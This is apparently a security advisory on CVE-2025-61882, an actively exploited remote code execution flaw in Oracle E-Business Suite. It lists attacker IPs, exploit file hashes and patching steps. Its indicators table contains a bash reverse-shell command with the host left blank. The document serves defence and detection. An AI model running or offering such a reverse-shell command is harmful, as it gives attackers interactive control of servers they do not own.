CVE-2025-61882: Critical E-Business Suite zero-day vulnerability
Observation Summary
Oracle has released an advisory about a critical E-Business Suite zero-day vulnerability CVE-2025-61882 that allows attackers to perform unauthenticated remote code execution, with the flaw actively exploited in Clop data theft attacks.
What’s Happening
CVE-2025-61882 is a critical zero-day vulnerability in Oracle E-Business Suite, allowing unauthenticated remote code execution, which has been actively exploited by the Clop ransomware group It has a high CVSS score of 9.8, indicating an urgent security risk due to its potential for exploitation over the network without requiring any authentication.
CVSSv3 score: 9.8 (Critical)
Score as per Recorded Future: 99
Affected Product: Oracle E-Business Suite (EBS)
Component: Concurrent Processing – BI Publisher Integration
Attack Vector: Remote, unauthenticated (no username/password required)
First Reported: Oct 5, 2025
Affected Products and Versions: Oracle E-Business Suite, versions 12.2.3-12.2.14
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
| 200[.]107[.]207.26 | IP | Potential GET and POST activity |
| 185[.]181[.]60.11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Why It Matters
The exploitation of CVE-2025-61882 can result in
- Attackers gain shell access to Oracle EBS servers, enabling installation of malware, data exfiltration, and privilege escalation.
- Oracle EBS is often central to enterprise operations (finance, HR, procurement). Downtime can halt critical workflows.
- If EBS is integrated with external vendors or partners, compromise may extend beyond the organization
Recommendations
- Apply Oracle’s Critical Patch Update (CPU) for prerequisite fixes.
- Apply the Emergency Patch for CVE-2025-61882 available via My Oracle Support (Doc ID: 30061882.1)
- Block public access to EBS BI Publisher endpoints if not required
- Use Web Application Firewalls (WAFs) to detect and block suspicious payloads
- Enable verbose logging for BI Publisher and Concurrent Manager
- Audit recent changes to EBS configuration files and deployed servlets
